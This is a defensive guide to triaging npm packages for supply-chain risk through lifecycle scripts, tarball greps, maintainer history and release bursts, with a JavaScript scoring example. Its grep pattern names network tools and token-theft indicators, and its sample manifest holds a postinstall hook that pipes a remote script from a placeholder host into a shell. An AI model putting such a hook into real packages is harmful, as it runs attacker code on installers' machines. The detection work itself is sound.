Fast Triage
Copy-paste checks to identify risky packages in under 60 seconds.
1) Inspect scripts
npm view <pkg>@<ver> scripts --json
Look for lifecycle scripts: preinstall, install, postinstall, prepare. These run during npm i and can do anything — including network calls or file access.
2) Download and grep the tarball
mkdir -p pkg && npm pack <pkg>@<ver> && tar -xzf <pkg>-<ver>.tgz -C pkg && grep -RInE 'preinstall|postinstall|prepare|child_process|execSync|spawn|curl|wget|Invoke-WebRequest|discordapp|telegram|process\.env\.(AWS|NPM|GITHUB|TOKEN|KEY|SECRET)' pkg/
Search for risky patterns: child_process, network APIs, env tokens, and obfuscation. If these appear in lifecycle files, treat as high risk. (tar -C needs the target directory to exist, hence the mkdir; for a scoped package, npm pack names the tarball <scope>-<pkg>-<ver>.tgz.)
3) Check maintainers & publish history
npm view <pkg> maintainers time --json
Red flags: new maintainer recently, repo archived/removed, unusual version jumps. Legit packages can be compromised via accounts.
4) Get tarball URL
npm view <pkg>@<ver> dist.tarball
Use to verify the release artifact host. Prefer npm registry and GitHub Releases/CDNs. Unknown hosts warrant extra scrutiny.
5) Find repository URL
npm view <pkg> repository.url --json
Confirm there is a real, active upstream repo with history, issues, and maintainers. Empty or missing repos are suspicious.
6) List versions and publish times
npm view <pkg> versions time --json
Look for bursts of releases or sudden major changes — common during compromises or malicious takeovers.
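The six checks above, run in one pass over the JSON that `npm view <pkg> --json` prints, as an added example that is not part of the original page. The SAMPLE packument, the TRUSTED_HOSTS list and the 3-releases-in-24h burst threshold are constructed assumptions for the demo.

```javascript
// Added example (not the page's code): run the six checks over the JSON that
// `npm view <pkg> --json` prints. SAMPLE is a constructed packument, not a real package.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];
const RISKY = /child_process|execSync|spawn|curl|wget|Invoke-WebRequest|discordapp|telegram|process\.env\.(AWS|NPM|GITHUB|TOKEN|KEY|SECRET)/;
const TRUSTED_HOSTS = ['registry.npmjs.org']; // assumption: only the public registry is expected
const SAMPLE = {
  name: 'example-pkg', version: '1.4.0',
  scripts: { postinstall: 'curl -s https://example.invalid/s.sh | sh', test: 'jest' },
  repository: { type: 'git', url: '' },
  dist: { tarball: 'https://registry.npmjs.org/example-pkg/-/example-pkg-1.4.0.tgz' },
  time: {
    created: '2024-01-01T00:00:00Z', modified: '2024-06-02T03:00:00Z',
    '1.0.0': '2024-01-01T00:00:00Z', '1.2.0': '2024-03-01T00:00:00Z',
    '1.3.0': '2024-06-02T01:00:00Z', '1.3.1': '2024-06-02T02:00:00Z', '1.4.0': '2024-06-02T03:00:00Z',
  },
};
// Returns {level, msg} findings; an empty list means nothing was flagged.
function triage(meta, burstWindowHours = 24, burstCount = 3) {
  const findings = [];
  // Step 1: lifecycle scripts; rated high when the command matches the step-2 grep pattern.
  const scripts = meta.scripts || {};
  for (const hook of LIFECYCLE) {
    if (!scripts[hook]) continue;
    const level = RISKY.test(scripts[hook]) ? 'high' : 'medium';
    findings.push({ level, msg: `${hook} script: ${scripts[hook]}` });
  }
  // Step 4: artifact host. Step 5: upstream repository URL (string or {url} form).
  const host = meta.dist && meta.dist.tarball ? new URL(meta.dist.tarball).host : null;
  if (host && !TRUSTED_HOSTS.includes(host)) findings.push({ level: 'medium', msg: `tarball hosted at ${host}` });
  const repo = typeof meta.repository === 'string' ? meta.repository : (meta.repository || {}).url;
  if (!repo) findings.push({ level: 'medium', msg: 'no repository URL in metadata' });
  // Step 6: release bursts, i.e. burstCount versions published inside one burstWindowHours window.
  const times = Object.entries(meta.time || {})
    .filter(([k]) => k !== 'created' && k !== 'modified')
    .map(([v, t]) => [v, Date.parse(t)])
    .sort((a, b) => a[1] - b[1]);
  const win = burstWindowHours * 3600 * 1000;
  for (let i = 0; i + burstCount - 1 < times.length; i++) {
    const j = i + burstCount - 1;
    if (times[j][1] - times[i][1] <= win) {
      findings.push({ level: 'medium', msg: `${burstCount} releases within ${burstWindowHours}h: ${times[i][0]}..${times[j][0]}` });
      break;
    }
  }
  return findings;
}
console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

Step 3 (maintainer changes) needs the `maintainers` history compared against an earlier snapshot, which a single packument does not carry, so it stays a manual check.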